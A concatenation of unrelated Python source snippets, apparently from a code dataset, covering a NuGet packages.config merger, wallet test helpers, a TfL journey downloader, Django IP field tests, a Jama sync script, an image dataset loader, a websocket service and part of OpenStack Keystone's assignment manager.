return parser.parse_args()
def match(value, target_string):
for target in target_string.split("|"):
if target=="":
return True
if target==value:
return True
return False
def main():
options, args = parse_args()
rootElement = Element('packages')
packages = {}
print "Searching for packages.config files:"
for dirpath, subdirs, filenames in walk('src'):
for filename in filenames:
if filename == 'packages.config':
filepath = join(dirpath, filename)
print " " + filepath
et = parse(filepath)
for packageElement in et.findall('package'):
pkgId = packageElement.get('id')
pkgVersion = packageElement.get('version')
packages[pkgId, pkgVersion] = packageElement
print
print "Writing projectdata/packages.config:"
rootElement.extend([value for (key,value) in sorted(packages.items())])
indent(rootElement)
tree = ElementTree(rootElement)
dump(tree)
tree.write('projectdata/packages.config')
if __name__ == "__main__":
main()
| StarcoderdataPython |
4819507 | import os
import random
import mnemonic
import string
from pyblake2 import blake2b
import base58
def generate_mnemonic(language='english'):
""" Generate Mnemonic: Creates insecure random nmemonics for testing
Args:
language (str): defaults to english , all bip languages are supported.
Returns:
(str): a list of mnemonic words separated by spaces
Notes:
These values MUST not be used for wallets with real ADA as they are
not securely generated so could be predictable.
"""
phrase_generator = mnemonic.Mnemonic(language)
# make some insecure entropy
strength_bits = 128
entropy = os.urandom(strength_bits // 8)
# make a phrase from it
return phrase_generator.to_mnemonic(entropy)
def check_mnemonic(string, language='english'):
""" Check menmonic:
Uses the python mnemonic library to check the supplied mnemonic is complies to the BIP-0039 standards
Args:
string(str): a list of mnemonic words seperated by spaces to be checked
languge(str): a language to verify the mnemonic in , defaults to english
"""
object = mnemonic.Mnemonic(language)
return object.check(string)
def generate_walletname(evil=0, length=8):
""" Generate Walletname: Creates wallet names of varying lengths and evilness
Args:
evil (int): 1 = alphanumeric , 2 = punctuation , 3 = any printable charecter
length (int): length of wallet name
Notes:
Python string constants are used to create the charecter lists
https://docs.python.org/3.4/library/string.html
"""
string_options = str
# configurable levels of evil content for wallet names
if evil == 0:
string_options = string.ascii_uppercase + string.digits
if evil == 1:
string_options = string.punctuation
if evil == 2:
string_options = string.printable
return ''.join(random.choices(string_options, k=length))
def encode_spending_password(string):
"""" Create a blake2 hash and base58 encode it for use as a spending password
Args:
string(str): a string to encode as a password
Returns:
bytes: base58 encoding string
"""
# might need to do some padding
bl = blake2b(string.encode('utf-8'), digest_size=24)
return base58.b58encode(bl.digest())
def generate_spending_password(evil=0, length=16):
"""" Generate a spending password and encode it
Args:
evil (int): 1 = alphanumeric , 2 = punctuation , 3 = any printable charecter
length (int): length of wallet name
Returns:
bytes: base58 encoded password
"""
return encode_spending_password(generate_walletname(evil=evil, length=length)) | StarcoderdataPython |
1739075 | <gh_stars>0
import os
import json
import requests
import datetime
import time
from tqdm import tqdm
from multiprocessing import Pool
def divide_chunks(l, n):
for i in range(0, len(l), n):
yield l[i : i + n]
app_key = ""
app_id = ""
with open("credentials.json", "r") as cred_file:
creds = json.load(cred_file)
app_key = creds["tfl_app_key"]
app_id = creds["tfl_app_id"]
def get_new_directions(res):
torrington_place_id = "1013720"
request_string = (
"https://api.tfl.gov.uk/Journey/JourneyResults/"
+ res["address"].replace(" ", "%20").replace(",", "%2C")
+ "/to/"
+ torrington_place_id
+ "?nationalSearch=false&journeyPreference=LeastTime&app_key="
+ app_key
+ "&app_id="
+ app_id
)
response = requests.get(url=request_string)
try:
return response.json()
except json.JSONDecodeError as err:
print(err)
return {"status": "fail"}
def convert_direction_json_to_routes(directions):
if not "journeys" in directions.keys():
return []
routes = []
for journey in directions["journeys"]:
route = {}
legs = []
for leg in journey["legs"]:
summary = leg["instruction"]["summary"]
dest = summary.split(" to ")[-1]
if "Walk " in summary:
legs.append({"type": "walk", "dest": dest, "duration": leg["duration"]})
elif " line " in summary:
line = summary.split(" to ")[0]
legs.append(
{
"type": "tube",
"dest": dest,
"duration": leg["duration"],
"line": line,
}
)
else:
bus_num = summary.split(" bus ")[0]
legs.append(
{
"type": "bus",
"dest": dest,
"duration": leg["duration"],
"line": bus_num,
}
)
route["legs"] = legs
route["total_duration"] = sum(map(lambda x: x["duration"], legs))
already_exists = False
for other_route in routes:
if len(other_route["legs"]) == len(route["legs"]):
match = True
for i in range(len(route["legs"])):
match = (
match
and route["legs"][i]["type"] == other_route["legs"][i]["type"]
)
if match:
match = (
match
and route["legs"][i]["dest"]
== other_route["legs"][i]["dest"]
)
if route["legs"][i]["type"] != "walk":
match = (
match
and route["legs"][i]["line"]
== other_route["legs"][i]["line"]
)
if match:
already_exists = True
break
if not already_exists:
routes.append(route)
return routes
def download_and_save_directions_single(path):
prop = json.load(open(path + "/property.json", "r"))
directions = get_new_directions(prop)
routes = convert_direction_json_to_routes(directions)
with open(path + "/directions.json", "w+") as directions_file:
directions_file.write(json.dumps(directions, indent=4))
for i in range(len(routes)):
with open(path + "/route_" + str(i) + ".json", "w+") as route_file:
route_file.write(json.dumps(routes[i], indent=4))
def download_and_save_directions():
start = datetime.datetime.now()
file_paths = []
with open("property_index.json", "r") as index_file:
file_paths = json.load(index_file)
for path in file_paths:
if os.path.exists(path + "/directions.json"):
os.remove(path + "/directions.json")
i = 0
while os.path.exists(path + "/route_" + str(i) + ".json"):
os.remove(path + "/route_" + str(i) + ".json")
i += 1
print("getting directions for", len(file_paths), "properties")
split_file_paths = list(divide_chunks(file_paths, 450))
for i in range(len(split_file_paths)):
chunk_of_paths = split_file_paths[i]
print("starting on chunk", i, "of length", len(chunk_of_paths))
with Pool(len(chunk_of_paths)) as p:
print("worker pool started, requesting and downloading data...")
p.map(download_and_save_directions_single, chunk_of_paths)
if i + 1 < len(split_file_paths):
# need to wait cause TFL doesn't allow more than 500 requests per minute
print("waiting")
for t in tqdm(range(6000)):
time.sleep(0.01)
print("done,", (datetime.datetime.now() - start).total_seconds(), "s")
def check_all_properties_have_directions():
file_paths = []
with open("property_index.json", "r") as index_file:
file_paths = json.load(index_file)
disambugations = []
for path in file_paths:
if not os.path.exists(path + "/property.json") or not os.path.exists(
path + "/directions.json"
):
print(path)
with open(path + "/directions.json", "r") as dir_file:
directions = json.load(dir_file)
if not "journeys" in directions:
# print(path + "/directions.json")
disambugations.append(path)
print("got", len(disambugations), "disambugations")
if __name__ == "__main__":
download_and_save_directions()
check_all_properties_have_directions()
| StarcoderdataPython |
144890 | import numpy as np
import pytest
from ome_zarr.scale import Scaler
class TestScaler:
@pytest.fixture(
params=(
(1, 2, 1, 256, 256),
(3, 512, 512),
(256, 256),
),
ids=["5D", "3D", "2D"],
)
def shape(self, request):
return request.param
def create_data(self, shape, dtype=np.uint8, mean_val=10):
rng = np.random.default_rng(0)
return rng.poisson(mean_val, size=shape).astype(dtype)
def check_downscaled(self, downscaled, shape, scale_factor=2):
expected_shape = shape
for data in downscaled:
assert data.shape == expected_shape
expected_shape = expected_shape[:-2] + tuple(
sh // scale_factor for sh in expected_shape[-2:]
)
def test_nearest(self, shape):
data = self.create_data(shape)
scaler = Scaler()
downscaled = scaler.nearest(data)
self.check_downscaled(downscaled, shape)
# this fails because of wrong channel dimension; need to fix in follow-up PR
@pytest.mark.xfail
def test_gaussian(self, shape):
data = self.create_data(shape)
scaler = Scaler()
downscaled = scaler.gaussian(data)
self.check_downscaled(downscaled, shape)
# this fails because of wrong channel dimension; need to fix in follow-up PR
@pytest.mark.xfail
def test_laplacian(self, shape):
data = self.create_data(shape)
scaler = Scaler()
downscaled = scaler.laplacian(data)
self.check_downscaled(downscaled, shape)
def test_local_mean(self, shape):
data = self.create_data(shape)
scaler = Scaler()
downscaled = scaler.local_mean(data)
self.check_downscaled(downscaled, shape)
@pytest.mark.skip(reason="This test does not terminate")
def test_zoom(self, shape):
data = self.create_data(shape)
scaler = Scaler()
downscaled = scaler.zoom(data)
self.check_downscaled(downscaled, shape)
| StarcoderdataPython |
1791615 | import logging
from bs4 import BeautifulSoup
from dateutil import parser
from config import Config
from jamaClient import JamaClient
class Process:
def __init__(self):
self.jama_client = JamaClient()
self.items = []
self.jama_config = Config()
self.jama_client.setConfig(self.jama_config)
self.item_type_ID = self.jama_config.testCaseStepItemTypeID
self.realtionship_type_ID = self.jama_config.relationshipTypeID
self.updateCount = 0
self.failedCount = 0
self.totalCount = 0
self.projectID = self.jama_config.projectID
self.successfulPostRelationshipCount = 0
self.failedToPostRelationshipCount = 0
self.failedToDeleteRelationshipCount = 0
self.successfulDeleteRelationshipCount = 0
def post_for_access_token(self):
self.jama_config.update_last_run_time()
def process(self):
self.useCaseField = self.jama_config.testCaseField
if self.useCaseField.endswith("$"):
self.useCaseField = self.useCaseField + str(self.item_type_ID)
# Get All Projects
if self.projectID != None:
url = "abstractitems?project=" + str(self.projectID) + "&itemType=" + str(self.item_type_ID)
else:
url = "abstractitems?itemType=" + str(self.item_type_ID)
items = self.jama_client.get_all(url)
if items == None:
self.jama_config.successLogger.log(logging.INFO, "No items retrieved from Jama for itemType [" + str(self.item_type_ID) + "]. No items to be processed.")
return
self.items = self.filter_items_from_last_run(items)
if items == None:
self.jama_config.successLogger.log(logging.INFO, "No items found with a lastModifiedDate newer than the last run date of [" + self.jama_config.last_run_time + "]. No items to be processed.")
return
self.totalCount = len(self.items)
self.jama_config.successLogger.log(logging.INFO, "Total number of items to process [" + str(self.totalCount) + "]")
for item in self.items:
self.process_item(item)
self.jama_config.successLogger.log(logging.INFO, "\n\n")
self.jama_config.successLogger.log(logging.INFO, "Number of successfully updated [" + str(self.updateCount) + "] item(s)")
self.jama_config.successLogger.log(logging.INFO, "Number of items with errors during updates [" + str(self.failedCount) + "]")
self.jama_config.successLogger.log(logging.INFO, "Number of successfully created relationships [" + str(self.successfulPostRelationshipCount) + "]")
self.jama_config.successLogger.log(logging.INFO, "Number of successfully deleted relationships [" + str(self.successfulDeleteRelationshipCount) + "]")
self.jama_config.successLogger.log(logging.INFO, "Number of failed created relationships [" + str(self.failedToPostRelationshipCount) + "]")
self.jama_config.successLogger.log(logging.INFO, "Number of failed deleted relationships [" + str(self.failedToDeleteRelationshipCount) + "]")
if self.failedToPostRelationshipCount > 0:
self.jama_config.failureLogger.log(logging.ERROR, "Number of relationships that failed to be created [" + str(self.failedToPostRelationshipCount) + "].")
if self.failedToDeleteRelationshipCount > 0:
self.jama_config.failureLogger.log(logging.ERROR, "Number of relationships that failed to be deleted [" + str(self.failedToDeleteRelationshipCount) + "].")
if self.failedCount > 0:
self.jama_config.failureLogger.log(logging.ERROR, "Number of items that failed to update [" + str(self.failedCount) + "/" + str(self.totalCount) + "].")
self.jama_config.update_last_run_time()
self.jama_config.successLogger.log(logging.INFO, "Finished...")
exit(0)
def process_item(self, item):
upstream_related_items = self.extract_upstream_related(item["id"])
linked_use_case_items = self.extract_field_linked_items(item["id"], item["fields"][self.useCaseField])
value = self.cross_reference(upstream_related_items, linked_use_case_items, item)
if value == True:
self.updateCount = self.updateCount + 1
self.jama_config.successLogger.log(logging.INFO, "Successfully updated item [" + str(item["id"]) + "]")
elif value == False:
self.failedCount = self.failedCount + 1
self.jama_config.successLogger.log(logging.INFO, "Encountered failures when updating item [" + str(item["id"]) + "]. Check the error logs for more information.")
else:
lastRun = " [" + str(self.jama_config.last_run_time) + "]" if str(self.jama_config.last_run_time) != None else ""
self.jama_config.successLogger.log(logging.INFO, "Item [" + str(item["id"]) + "] has not been modified since last run" + ". No update necessary.")
def filter_items_from_last_run(self, items):
toReturn = []
for item in items:
if self.is_newer(item["modifiedDate"]):
toReturn.append(item)
return toReturn
def is_newer(self, lastModifiedDate):
modifiedDate = parser.parse(str(lastModifiedDate).rstrip(".000+0000"))
if self.jama_config.last_run_time == None or modifiedDate > self.jama_config.last_run_time:
return True
return False
def extract_upstream_related(self, itemId):
upstream_related_dict = []
upstream_links = self.jama_client.get_upstream_related(itemId=itemId)
for upstream_link in upstream_links:
item = {}
item.__setitem__("relationshipID", upstream_link["id"])
item.__setitem__("upstreamItem", upstream_link["fromItem"])
item.__setitem__("relationship", upstream_link)
upstream_related_dict.append(item)
self.jama_config.successLogger.log(logging.INFO, "Successfully extracted upstream related items for item [" + str(itemId) + "]")
return upstream_related_dict
def extract_field_linked_items(self, itemID, content):
dictionary = []
richText = BeautifulSoup(content, 'html.parser')
if richText is not None:
for link in richText.find_all('a'):
item = {}
item.__setitem__("id", self.parseId(link))
item.__setitem__("link", link)
dictionary.append(item)
self.jama_config.successLogger.log(logging.INFO, "Successfully extracted linked items from [" + self.jama_config.testCaseField + "] field for item [" + str(itemID) + "]")
return dictionary
def cross_reference(self, upstream_related_items, field_link_items, item):
patch = False
found = False
relationshipsToDelete = []
relationshipsToPost = []
## Check all upstream related items are located in the field_link_items
for upstream_related_item in upstream_related_items:
for link_item in field_link_items:
if upstream_related_item.get("upstreamItem") == link_item.get("id"):
found = True
break
if found == False:
relationshipsToDelete.append(upstream_related_item)
patch = True
found = False
## Check all field_link_items are valid upstream related items
for link_item in field_link_items:
for upstream_related_item in upstream_related_items:
if upstream_related_item.get("upstreamItem") == link_item.get("id"):
found = True
break
if found == False:
relationshipsToPost.append(link_item)
patch = True
found = False
if patch == True:
self.jama_config.successLogger.log(logging.INFO, "Item [" + str(item["id"]) + "] upstream related items require an update...")
success_delete = self.delete_relationships(relationshipsToDelete, item["id"])
success_post = self.post_item_relationships(relationshipsToPost, item["id"])
return success_delete or success_post
# return "UPDATED"
return None
def post_item_relationships(self, upstream_links, item):
relationships = []
for upstream_link in upstream_links:
relationship = self.create_relationship_post_payload(item, upstream_link["id"])
if relationship is not None:
relationships.append(relationship)
return self.post(itemID=item, relationships=relationships)
def post(self, itemID, relationships):
success = None
for relationship in relationships:
relationshipID = self.jama_client.post_relationship(relationship)
if relationshipID == None:
self.jama_config.successLogger.log(logging.WARNING, "Relationship [" + str(relationship) + "] already exists.")
self.successfulPostRelationshipCount = self.successfulPostRelationshipCount + 1
else:
try:
relationship_id = int(relationshipID)
if relationship_id != None:
if success == None:
success = True
self.jama_config.successLogger.log(logging.INFO, "Created relationship [" + str(relationship_id) + "] for item [" + str(itemID) + "]")
self.successfulPostRelationshipCount = self.successfulPostRelationshipCount + 1
except Exception as e:
success = False
self.jama_config.failureLogger.log(logging.ERROR, "Failed to create relationship [" + str(relationship) + "] for item [" + str(itemID) + "] due to [" + e.message + "]")
self.failedToPostRelationshipCount = self.failedToPostRelationshipCount + 1
return success
def delete_relationships(self, upstream_related_items, itemID):
success = None
for relationship in upstream_related_items:
response = self.jama_client.delete_relationship(relationship.get("relationshipID"))
if response == None:
if success == None:
success = True
self.jama_config.successLogger.log(logging.INFO, "Successfully deleted relationship [" + str(relationship.get("relationship")) + "] to update item [" + str(itemID) + "]")
self.successfulDeleteRelationshipCount = self.successfulDeleteRelationshipCount + 1
else:
success = False
self.jama_config.failureLogger.log(logging.ERROR, "Failed to deleted relationship [" + str(relationship.get("relationship")) + "] for item [" + str(itemID) + "]")
self.failedToDeleteRelationshipCount = self.failedToDeleteRelationshipCount + 1
return success
def parseId(self, item):
try:
string_starting_with_id = str(item)[str(item).index("docId=") + 6:]
item_id = string_starting_with_id[:string_starting_with_id.index("\" target")]
# self.jama_config.successLogger.log(logging.INFO, "Parsed item id [" + str(item_id) + "] from link [" + str(item) + "]")
return int(item_id)
except Exception as e:
self.jama_config.successLogger.log(logging.INFO, "Unable to extract item ID from reference [" + str(item) + "] -- SKIPPING")
def create_relationship_post_payload(self, itemID, upstreamRelatedID):
relationship = {}
relationship.__setitem__("fromItem", upstreamRelatedID)
relationship.__setitem__("toItem", itemID)
relationship.__setitem__("relationshipType", self.jama_config.relationshipTypeID)
return relationship
| StarcoderdataPython |
3212202 | <filename>DGF/__init__.py
from .fields import Field
from .models import Schema
from .combiner import Combiner
from .pipeline import BaseLink, QUERY, ADD, CHANGE, DELETE
from .auth.permission import BasePermission
from .auth.authenticator import BaseAuthenticator
from .auth.permission import BasePermission
from .exceptions import Unauthorized, SchemaException
| StarcoderdataPython |
3293146 | from .loss import EvidentialLossSumOfSquares
from .paper_loss import PaperEvidentialLossSumOfSquares
| StarcoderdataPython |
1696172 | <reponame>20c/django-inet<filename>tests/test_models.py
import ipaddress
import pytest
from django.core.exceptions import ValidationError
from django.test import TestCase
from models import FullModel
from django_inet.models import (
ASNField,
IPAddressField,
IPNetworkField,
IPPrefixField,
MacAddressField,
URLField,
)
def assert_ip_validator(obj):
"""
assert the validator is set correctly and referring to the correct object
"""
assert 0 == len(obj.default_validators)
assert 1 == len(obj.validators)
assert obj == obj.validators[0].field
assert obj.version == obj.validators[0].field.version
class ModelTests(TestCase):
"""test model functionality"""
def test_init(self):
new0 = URLField()
new1 = URLField()
assert 1 == len(new0.default_validators)
assert 1 == len(new1.default_validators)
new0 = ASNField()
new1 = ASNField()
assert 0 == len(new0.default_validators)
assert 0 == len(new1.default_validators)
new0 = IPAddressField()
new1 = IPAddressField()
assert_ip_validator(new0)
assert_ip_validator(new1)
new0 = IPNetworkField()
new1 = IPNetworkField()
assert_ip_validator(new0)
assert_ip_validator(new1)
new0 = IPPrefixField()
new1 = IPPrefixField()
assert_ip_validator(new0)
assert_ip_validator(new1)
new0 = MacAddressField()
new1 = MacAddressField()
assert 1 == len(new0.default_validators)
assert 1 == len(new1.default_validators)
def test_blank(self):
model = FullModel()
model.full_clean()
def test_asn(self):
model = FullModel()
model.asn = 42
assert 42 == model.asn
model.full_clean()
with pytest.raises(ValidationError):
model.asn = "invalid"
model.full_clean()
with pytest.raises(ValidationError):
model.asn = -1
model.full_clean()
model.asn = 4294967295
model.full_clean()
assert model.asn == 4294967295
def test_ipaddress(self):
model = FullModel()
model.ip_address = "10.0.0.0"
assert ipaddress.ip_address("10.0.0.0") == model.ip_address
with pytest.raises(ValidationError):
model.ip_address = "invalid"
def test_ipv4(self):
model = FullModel()
model.ipv4 = "10.0.0.0"
assert ipaddress.ip_address("10.0.0.0") == model.ipv4
with pytest.raises(ValidationError):
model.ipv4 = "fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b"
def test_ipv6(self):
model = FullModel()
model.ipv6 = "10::"
assert ipaddress.ip_address("10::") == model.ipv6
with pytest.raises(ValidationError):
model.ipv6 = "10.0.0.0"
def test_ipnetwork(self):
model = FullModel()
model.prefix = "10.0.0.0/8"
with pytest.raises(ValidationError):
model.prefix = "invalid"
def test_mac(self):
model = FullModel()
model.mac = "Ff:00:00:12:34:56"
model.full_clean()
assert "Ff:00:00:12:34:56" == model.mac
with pytest.raises(ValidationError):
model.mac = "invalid"
model.full_clean()
| StarcoderdataPython |
169554 | '''
Module to define the dataset(s) used for training and validation
'''
__author__ = '<NAME>'
from simpleml.datasets import PandasDataset
import os
import numpy as np
import pandas as pd
import requests
import cv2
from tqdm import tqdm
current_directory = os.path.dirname(os.path.realpath(__file__))
NEGATIVE_IMAGE_DIRECTORY = os.path.abspath(os.path.join(current_directory, '../../data/negative/'))
POSITIVE_IMAGE_DIRECTORY = os.path.abspath(os.path.join(current_directory, '../../data/positive/'))
IMAGENET_LINK_DIRECTORY = os.path.abspath(os.path.join(current_directory, '../../data/imagenet_links/'))
NEGATIVE_LABEL = 0
POSITIVE_LABEL = 1
IMAGENET_POSITIVE_LABEL = 'squirrel'
class ImageLoadingDataset(PandasDataset):
def download_images(self):
# Check if already downloaded before doing anything
already_downloaded = self.state.get('links_downloaded', False)
if already_downloaded:
return
# Load Txt links
link_dictionary = {}
for filename in os.listdir(IMAGENET_LINK_DIRECTORY):
with open(os.path.join(IMAGENET_LINK_DIRECTORY, filename)) as f:
link_dictionary[filename[:-4]] = [x.strip() for x in f.readlines()]
# Split into "positive" and "negative" lists
positive_links = link_dictionary[IMAGENET_POSITIVE_LABEL]
negative_links = []
# There are duplicates, unfortunately, so have to dedupe
for class_label, link_list in link_dictionary.iteritems():
if class_label == IMAGENET_POSITIVE_LABEL:
continue
negative_links.extend([item for item in link_list if item not in positive_links])
for link_list, directory in zip([positive_links, negative_links], [POSITIVE_IMAGE_DIRECTORY, NEGATIVE_IMAGE_DIRECTORY]):
for link in link_list:
filename = link.rsplit('/', 1)[-1]
try:
response = requests.get(link)
if response.status_code == 200:
with open(os.path.join(directory, filename), 'wb') as f:
f.write(response.content)
except Exception as e: #requests.exceptions.ConnectionError as e:
print(e)
# Make note that links were downloaded so it wont do it again
self.state['links_downloaded'] = True
def load_images(self, directory_path, label):
file_list = []
for filename in tqdm(os.listdir(directory_path)):
filepath = os.path.join(directory_path, filename)
if os.path.isfile(filepath):
try: # Attempt to load files because many are corrupted or blank
img = cv2.imdecode(np.asarray(bytearray(open(filepath, "rb").read()), dtype=np.uint8), 1)
cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
# file_list.append(filepath.decode('UTF-8')) # Python 2
file_list.append(filepath) # Python 3
except (IOError, cv2.error) as e:
print(e)
return pd.DataFrame(list(zip(file_list, [label] * len(file_list))),
columns=['image', 'label'])
class SquirrelDataset(ImageLoadingDataset):
def build_dataframe(self):
# self.download_images()
negative_df = self.load_images(NEGATIVE_IMAGE_DIRECTORY, NEGATIVE_LABEL)
positive_df = self.load_images(POSITIVE_IMAGE_DIRECTORY, POSITIVE_LABEL)
self._external_file = pd.concat([negative_df, positive_df], axis=0)
| StarcoderdataPython |
178020 | <filename>examples/heartbeat/service.py
import asyncio
import traceback
import json
from asyncio.queues import Queue
from collections import defaultdict
from uuid import uuid4 as uuidv4
import websockets
from helpers import ServmanAgent, action
from typings import IParcel
from path import Path
class PongService(ServmanAgent):
def __init__(self, *args, **kwargs):
super().__init__(connection_config=kwargs['connection_config'])
# State
self.ping_count = 0
# Connection details
# You will need this information to send parcels to the client
self.owner_id = kwargs['owner_id']
self.owner_connection_id = kwargs['owner_connection_id']
self.identifier = kwargs['identifier']
### Actions
@action()
async def ping(self, parcel: IParcel, websocket, queue):
self.ping_count += 1
new_parcel: IParcel = {
'routing': 'client',
'destination_id': self.owner_connection_id,
'action': 'pong',
'data': {
'msg': f"PONG! ({self.ping_count} pings and counting from {self._agent_id}!)"
}
}
await websocket.send(json.dumps(new_parcel))
if self.ping_count >= 10:
await asyncio.sleep(3)
try:
exit()
except BaseException:
pass
### Tasks
async def on_connect(self, websocket, queue):
parcel: IParcel = {
'routing': 'client',
'destination_id': self.owner_connection_id,
'action': 'catch_service_credentials',
'data': {
'identifier': self.identifier,
'connection_id': websocket.request_headers['connection_id']
}
}
await self._primary_websocket.send(json.dumps(parcel))
async def consume(self):
await self.wait_until_connected()
while self.ping_count < 10:
packet = await self._primary_websocket.recv()
parcel = json.loads(packet)
action = self._actions[parcel['action']]
asyncio.create_task(action.callback(action.agent, parcel, self._primary_websocket, self._primary_message_queue))
async def produce(self):
await self.wait_until_connected()
while self.ping_count < 10:
await self._primary_websocket.send(await self._primary_message_queue.get())
def pong_service(*args, **kwargs):
config_file = Path("conf/service_configuration.json")
if not config_file.exists():
print("Error: Connection config for service does not exist!")
exit()
connection_config = json.loads(config_file.read_text(encoding="utf-8"))
kwargs["connection_config"] = connection_config
pong_service = PongService(*args, **kwargs)
pong_service.run() | StarcoderdataPython |
1676424 | #
# This file contains the Python code from Program 6.8 of
# "Data Structures and Algorithms
# with Object-Oriented Design Patterns in Python"
# by <NAME>.
#
# Copyright (c) 2003 by <NAME>, P.Eng. All rights reserved.
#
# http://www.brpreiss.com/books/opus7/programs/pgm06_08.txt
#
class StackAsLinkedList(Stack):
def accept(self, visitor):
assert isinstance(visitor, Visitor)
ptr = self._list.head
while ptr is not None:
visitor.visit(ptr.datum)
if visitor.isDone:
return
ptr = ptr.next
# ...
| StarcoderdataPython |
10601 | # Copyright 2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Main entry point into the Assignment service."""
import copy
import itertools
from oslo_log import log
from keystone.common import cache
from keystone.common import driver_hints
from keystone.common import manager
from keystone.common import provider_api
import keystone.conf
from keystone import exception
from keystone.i18n import _
from keystone import notifications
CONF = keystone.conf.CONF
LOG = log.getLogger(__name__)
PROVIDERS = provider_api.ProviderAPIs
# This is a general cache region for assignment administration (CRUD
# operations).
MEMOIZE = cache.get_memoization_decorator(group='role')
# This builds a discrete cache region dedicated to role assignments computed
# for a given user + project/domain pair. Any write operation to add or remove
# any role assignment should invalidate this entire cache region.
COMPUTED_ASSIGNMENTS_REGION = cache.create_region(name='computed assignments')
MEMOIZE_COMPUTED_ASSIGNMENTS = cache.get_memoization_decorator(
group='role',
region=COMPUTED_ASSIGNMENTS_REGION)
@notifications.listener
class Manager(manager.Manager):
"""Default pivot point for the Assignment backend.
See :class:`keystone.common.manager.Manager` for more details on how this
dynamically calls the backend.
"""
driver_namespace = 'keystone.assignment'
_provides_api = 'assignment_api'
_SYSTEM_SCOPE_TOKEN = 'system'
_USER_SYSTEM = 'UserSystem'
_GROUP_SYSTEM = 'GroupSystem'
_PROJECT = 'project'
_ROLE_REMOVED_FROM_USER = 'role_removed_from_user'
_INVALIDATION_USER_PROJECT_TOKENS = 'invalidate_user_project_tokens'
def __init__(self):
assignment_driver = CONF.assignment.driver
super(Manager, self).__init__(assignment_driver)
self.event_callbacks = {
notifications.ACTIONS.deleted: {
'domain': [self._delete_domain_assignments],
},
}
def _delete_domain_assignments(self, service, resource_type, operations,
payload):
domain_id = payload['resource_info']
self.driver.delete_domain_assignments(domain_id)
def _get_group_ids_for_user_id(self, user_id):
# TODO(morganfainberg): Implement a way to get only group_ids
# instead of the more expensive to_dict() call for each record.
return [x['id'] for
x in PROVIDERS.identity_api.list_groups_for_user(user_id)]
def list_user_ids_for_project(self, tenant_id):
PROVIDERS.resource_api.get_project(tenant_id)
assignment_list = self.list_role_assignments(
project_id=tenant_id, effective=True)
# Use set() to process the list to remove any duplicates
return list(set([x['user_id'] for x in assignment_list]))
def _send_app_cred_notification_for_role_removal(self, role_id):
"""Delete all application credential for a specific role.
:param role_id: role identifier
:type role_id: string
"""
assignments = self.list_role_assignments(role_id=role_id)
for assignment in assignments:
if 'user_id' in assignment and 'project_id' in assignment:
payload = {
'user_id': assignment['user_id'],
'project_id': assignment['project_id']
}
notifications.Audit.internal(
notifications.REMOVE_APP_CREDS_FOR_USER, payload
)
@MEMOIZE_COMPUTED_ASSIGNMENTS
def get_roles_for_user_and_project(self, user_id, tenant_id):
"""Get the roles associated with a user within given project.
This includes roles directly assigned to the user on the
project, as well as those by virtue of group membership or
inheritance.
:returns: a list of role ids.
:raises keystone.exception.ProjectNotFound: If the project doesn't
exist.
"""
PROVIDERS.resource_api.get_project(tenant_id)
assignment_list = self.list_role_assignments(
user_id=user_id, project_id=tenant_id, effective=True)
# Use set() to process the list to remove any duplicates
return list(set([x['role_id'] for x in assignment_list]))
@MEMOIZE_COMPUTED_ASSIGNMENTS
def get_roles_for_trustor_and_project(self, trustor_id, project_id):
"""Get the roles associated with a trustor within given project.
This includes roles directly assigned to the trustor on the
project, as well as those by virtue of group membership or
inheritance, but it doesn't include the domain roles.
:returns: a list of role ids.
:raises keystone.exception.ProjectNotFound: If the project doesn't
exist.
"""
PROVIDERS.resource_api.get_project(project_id)
assignment_list = self.list_role_assignments(
user_id=trustor_id, project_id=project_id, effective=True,
strip_domain_roles=False)
# Use set() to process the list to remove any duplicates
return list(set([x['role_id'] for x in assignment_list]))
@MEMOIZE_COMPUTED_ASSIGNMENTS
def get_roles_for_user_and_domain(self, user_id, domain_id):
"""Get the roles associated with a user within given domain.
:returns: a list of role ids.
:raises keystone.exception.DomainNotFound: If the domain doesn't exist.
"""
PROVIDERS.resource_api.get_domain(domain_id)
assignment_list = self.list_role_assignments(
user_id=user_id, domain_id=domain_id, effective=True)
# Use set() to process the list to remove any duplicates
return list(set([x['role_id'] for x in assignment_list]))
def get_roles_for_groups(self, group_ids, project_id=None, domain_id=None):
"""Get a list of roles for this group on domain and/or project."""
# if no group ids were passed, there are no roles. Without this check,
# all assignments for the project or domain will be fetched,
# which is not what we want.
if not group_ids:
return []
if project_id is not None:
PROVIDERS.resource_api.get_project(project_id)
assignment_list = self.list_role_assignments(
source_from_group_ids=group_ids, project_id=project_id,
effective=True)
elif domain_id is not None:
assignment_list = self.list_role_assignments(
source_from_group_ids=group_ids, domain_id=domain_id,
effective=True)
else:
raise AttributeError(_("Must specify either domain or project"))
role_ids = list(set([x['role_id'] for x in assignment_list]))
return PROVIDERS.role_api.list_roles_from_ids(role_ids)
@notifications.role_assignment('created')
def _add_role_to_user_and_project_adapter(self, role_id, user_id=None,
group_id=None, domain_id=None,
project_id=None,
inherited_to_projects=False,
context=None):
# The parameters for this method must match the parameters for
# create_grant so that the notifications.role_assignment decorator
# will work.
PROVIDERS.resource_api.get_project(project_id)
PROVIDERS.role_api.get_role(role_id)
self.driver.add_role_to_user_and_project(user_id, project_id, role_id)
def add_role_to_user_and_project(self, user_id, tenant_id, role_id):
self._add_role_to_user_and_project_adapter(
role_id, user_id=user_id, project_id=tenant_id)
COMPUTED_ASSIGNMENTS_REGION.invalidate()
# TODO(henry-nash): We might want to consider list limiting this at some
# point in the future.
@MEMOIZE_COMPUTED_ASSIGNMENTS
def list_projects_for_user(self, user_id):
# FIXME(lbragstad): Without the use of caching, listing effective role
# assignments is slow, especially with large data set (lots of users
# with multiple role assignments). This should serve as a marker in
# case we have the opportunity to come back and optimize this code so
# that it can be performant without having a hard dependency on
# caching. Please see https://bugs.launchpad.net/keystone/+bug/1700852
# for more details.
assignment_list = self.list_role_assignments(
user_id=user_id, effective=True)
# Use set() to process the list to remove any duplicates
project_ids = list(set([x['project_id'] for x in assignment_list
if x.get('project_id')]))
return PROVIDERS.resource_api.list_projects_from_ids(project_ids)
